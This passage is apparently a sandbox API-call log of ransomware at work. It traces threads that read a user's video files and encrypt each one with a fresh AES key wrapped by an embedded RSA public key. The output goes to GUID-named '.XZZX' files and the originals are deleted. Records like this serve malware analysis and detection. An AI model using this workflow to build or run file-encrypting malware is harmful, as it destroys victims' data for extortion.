f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0133.085] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0133.085] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf8038) returned 1 [0133.086] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8038, dwCertEncodingType=0x1, pInfo=0x3cf1ac0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1af0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1af8*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d11358) returned 1 [0133.086] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.086] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0133.086] CryptEncrypt (in: hKey=0x3d11358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0133.087] CryptEncrypt (in: hKey=0x3d11358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf80c0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf80c0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0133.087] WriteFile (in: hFile=0x6ec, lpBuffer=0x3cf80c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf80c0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0133.087] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0133.087] WriteFile (in: hFile=0x6ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0133.087] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0133.087] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0133.087] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x6f0) returned 0x0 [0133.087] RegQueryValueExW (in: hKey=0x6f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xbc, lpcbData=0x420dfdc*=0x4) returned 0x0 [0133.087] RegCloseKey (hKey=0x6f0) returned 0x0 [0133.088] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x6f0) returned 0x0 [0133.088] RegSetValueExW (in: hKey=0x6f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xbd, cbData=0x4 | out: lpData=0x420dfec*=0xbd) returned 0x0 [0133.088] RegCloseKey (hKey=0x6f0) returned 0x0 [0133.088] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.088] VirtualFree (lpAddress=0x4210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.089] CloseHandle (hObject=0x6ec) returned 1 [0133.090] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0133.091] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0133.091] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\aC_Ja4AvvNCLsQMnj7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\ac_ja4avvnclsqmnj7.swf")) returned 1 [0133.092] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\aC_Ja4AvvNCLsQMnj7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\ac_ja4avvnclsqmnj7.swf")) returned 0 Thread: id = 454 os_tid = 0xa68 [0133.093] lstrcpyA (in: lpString1=0x469fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.093] lstrcpyW (in: lpString1=0x469f460, lpString2="bjQVhKZ0dfp8gRtn_Z.flv" | out: lpString1="bjQVhKZ0dfp8gRtn_Z.flv") returned="bjQVhKZ0dfp8gRtn_Z.flv" [0133.093] lstrcpyW (in: lpString1=0x469e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0133.093] SetErrorMode (uMode=0x1) returned 0x1 [0133.093] lstrcpyW (in: lpString1=0x469f860, lpString2="bjQVhKZ0dfp8gRtn_Z.flv" | out: lpString1="bjQVhKZ0dfp8gRtn_Z.flv") returned="bjQVhKZ0dfp8gRtn_Z.flv" [0133.093] CoCreateGuid (in: pguid=0x469e440 | out: pguid=0x469e440*(Data1=0xb110da79, Data2=0x4df6, Data3=0x46f6, Data4=([0]=0xac, [1]=0xb1, [2]=0xf, [3]=0x61, [4]=0x3e, [5]=0x35, [6]=0xc8, [7]=0xce))) returned 0x0 [0133.093] wsprintfW (in: param_1=0x469ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\bjQVhKZ0dfp8gRtn_Z.flv") returned 70 [0133.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x469fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0133.094] wsprintfW (in: param_1=0x469e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\37E85546159C2E64B110DA791A0612AC.XZZX") returned 85 [0133.094] StrStrW (lpFirst="bjQVhKZ0dfp8gRtn_Z.flv", lpSrch="XZZX") returned 0x0 [0133.094] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\bjQVhKZ0dfp8gRtn_Z.flv", dwFileAttributes=0x20) returned 1 [0133.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\bjQVhKZ0dfp8gRtn_Z.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\bjqvhkz0dfp8grtn_z.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0133.094] ReadFile (in: hFile=0x6e4, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0xcfd0, lpNumberOfBytesRead=0x469e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x469e418*=0xcfd0, lpOverlapped=0x0) returned 1 [0133.096] CloseHandle (hObject=0x6e4) returned 1 [0133.096] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40b0000 [0133.096] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40c0000 [0133.096] SetErrorMode (uMode=0x1) returned 0x1 [0133.096] lstrcpyW (in: lpString1=0x469e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0133.097] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8148) returned 1 [0133.099] CryptGenKey (in: hProv=0x3cf8148, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11298) returned 1 [0133.299] CryptExportKey (in: hKey=0x3d11298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x469e41c | out: pbData=0x0*, pdwDataLen=0x469e41c*=0x94) returned 1 [0133.299] CryptExportKey (in: hKey=0x3d11298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40c0000, pdwDataLen=0x469e41c | out: pbData=0x40c0000*, pdwDataLen=0x469e41c*=0x94) returned 1 [0133.299] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.300] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0133.300] CryptDestroyKey (hKey=0x3d11298) returned 1 [0133.300] CryptReleaseContext (hProv=0x3cf82e0, dwFlags=0x0) returned 0 [0133.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\37E85546159C2E64B110DA791A0612AC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\37e85546159c2e64b110da791a0612ac.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6dc [0133.301] WriteFile (in: hFile=0x6dc, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0xcfd0, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesWritten=0x469e438*=0xcfd0, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcfd0 [0133.302] WriteFile (in: hFile=0x6dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcfd5 [0133.302] WriteFile (in: hFile=0x6dc, lpBuffer=0x469f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x469f860*, lpNumberOfBytesWritten=0x469e438*=0x2c, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd001 [0133.302] WriteFile (in: hFile=0x6dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0133.303] SetFilePointer (in: hFile=0x6dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd006 [0133.303] SetErrorMode (uMode=0x1) returned 0x1 [0133.303] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0133.303] OutputDebugStringW (lpOutputString="end") [0133.303] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õi\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0133.303] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x469dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8 | out: pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8) returned 1 [0133.303] CryptAcquireContextW (in: phProv=0x469d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x469d3e4*=0x3cf8368) returned 1 [0133.304] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8368, dwCertEncodingType=0x1, pInfo=0x3cf1c60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1c90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1c98*, PublicKey.cUnusedBits=0x0), phKey=0x469d3ec | out: phKey=0x469d3ec*=0x3d11298) returned 1 [0133.304] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.304] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0133.304] CryptEncrypt (in: hKey=0x3d11298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x469d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x469d3f0*=0x80) returned 1 [0133.305] CryptEncrypt (in: hKey=0x3d11298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf83f0*, pdwDataLen=0x469d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf83f0*, pdwDataLen=0x469d3e8*=0x80) returned 1 [0133.305] WriteFile (in: hFile=0x6dc, lpBuffer=0x3cf83f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf83f0*, lpNumberOfBytesWritten=0x469e438*=0x80, lpOverlapped=0x0) returned 1 [0133.305] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0133.305] WriteFile (in: hFile=0x6dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0133.305] GetUserNameW (in: lpBuffer=0x469e1f8, pcbBuffer=0x469dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x469dfe0) returned 1 [0133.305] wsprintfW (in: param_1=0x469dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0133.305] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe4 | out: phkResult=0x469dfe4*=0x6f4) returned 0x0 [0133.305] RegQueryValueExW (in: hKey=0x6f4, lpValueName="E1010314", lpReserved=0x0, lpType=0x469dfd8, lpData=0x469dfec, lpcbData=0x469dfdc*=0x4 | out: lpType=0x469dfd8*=0x4, lpData=0x469dfec*=0xbe, lpcbData=0x469dfdc*=0x4) returned 0x0 [0133.305] RegCloseKey (hKey=0x6f4) returned 0x0 [0133.305] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe8 | out: phkResult=0x469dfe8*=0x6f4) returned 0x0 [0133.306] RegSetValueExW (in: hKey=0x6f4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x469dfec*=0xbf, cbData=0x4 | out: lpData=0x469dfec*=0xbf) returned 0x0 [0133.306] RegCloseKey (hKey=0x6f4) returned 0x0 [0133.306] VirtualFree (lpAddress=0x40b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.306] VirtualFree (lpAddress=0x40c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.306] CloseHandle (hObject=0x6dc) returned 1 [0133.311] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0133.312] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0133.312] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\bjQVhKZ0dfp8gRtn_Z.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\bjqvhkz0dfp8grtn_z.flv")) returned 1 [0133.313] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\bjQVhKZ0dfp8gRtn_Z.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\bjqvhkz0dfp8grtn_z.flv")) returned 0 Thread: id = 455 os_tid = 0xa6c [0133.245] lstrcpyA (in: lpString1=0x424fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.245] lstrcpyW (in: lpString1=0x424f460, lpString2="xTAGaGiIpU.mp4" | out: lpString1="xTAGaGiIpU.mp4") returned="xTAGaGiIpU.mp4" [0133.245] lstrcpyW (in: lpString1=0x424e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0133.245] SetErrorMode (uMode=0x1) returned 0x1 [0133.246] lstrcpyW (in: lpString1=0x424f860, lpString2="xTAGaGiIpU.mp4" | out: lpString1="xTAGaGiIpU.mp4") returned="xTAGaGiIpU.mp4" [0133.246] CoCreateGuid (in: pguid=0x424e440 | out: pguid=0x424e440*(Data1=0x435ca8a7, Data2=0x67d2, Data3=0x4475, Data4=([0]=0xbd, [1]=0x93, [2]=0xfe, [3]=0x12, [4]=0x54, [5]=0xfb, [6]=0xe9, [7]=0x44))) returned 0x0 [0133.246] wsprintfW (in: param_1=0x424ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\xTAGaGiIpU.mp4") returned 62 [0133.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x424fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0133.246] wsprintfW (in: param_1=0x424e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned 85 [0133.246] StrStrW (lpFirst="xTAGaGiIpU.mp4", lpSrch="XZZX") returned 0x0 [0133.246] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\xTAGaGiIpU.mp4", dwFileAttributes=0x20) returned 1 [0133.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\xTAGaGiIpU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\xtagagiipu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6dc [0133.247] ReadFile (in: hFile=0x6dc, lpBuffer=0x4385cd0, nNumberOfBytesToRead=0x1772f, lpNumberOfBytesRead=0x424e418, lpOverlapped=0x0 | out: lpBuffer=0x4385cd0*, lpNumberOfBytesRead=0x424e418*=0x1772f, lpOverlapped=0x0) returned 1 [0133.248] CloseHandle (hObject=0x6dc) returned 1 [0133.249] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0133.249] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0133.249] SetErrorMode (uMode=0x1) returned 0x1 [0133.250] lstrcpyW (in: lpString1=0x424e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0133.250] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf82e0) returned 1 [0133.253] CryptGenKey (in: hProv=0x3cf82e0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11318) returned 1 [0133.411] CryptExportKey (in: hKey=0x3d11318, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x424e41c | out: pbData=0x0*, pdwDataLen=0x424e41c*=0x94) returned 1 [0133.411] CryptExportKey (in: hKey=0x3d11318, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x424e41c | out: pbData=0x40a0000*, pdwDataLen=0x424e41c*=0x94) returned 1 [0133.411] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.412] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0133.412] CryptDestroyKey (hKey=0x3d11318) returned 1 [0133.412] CryptReleaseContext (hProv=0x3cf82e0, dwFlags=0x0) returned 0 [0133.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\89dd89fe1bc33afa435ca8a71fe81f42.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f4 [0133.413] WriteFile (in: hFile=0x6f4, lpBuffer=0x4385cd0*, nNumberOfBytesToWrite=0x1772f, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x4385cd0*, lpNumberOfBytesWritten=0x424e438*=0x1772f, lpOverlapped=0x0) returned 1 [0133.414] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1772f [0133.414] WriteFile (in: hFile=0x6f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0133.415] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17734 [0133.415] WriteFile (in: hFile=0x6f4, lpBuffer=0x424f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x424f860*, lpNumberOfBytesWritten=0x424e438*=0x1c, lpOverlapped=0x0) returned 1 [0133.415] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17750 [0133.415] WriteFile (in: hFile=0x6f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0133.415] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17755 [0133.415] SetErrorMode (uMode=0x1) returned 0x1 [0133.415] lstrlenA (lpString="-----BEGIN PUBLIC 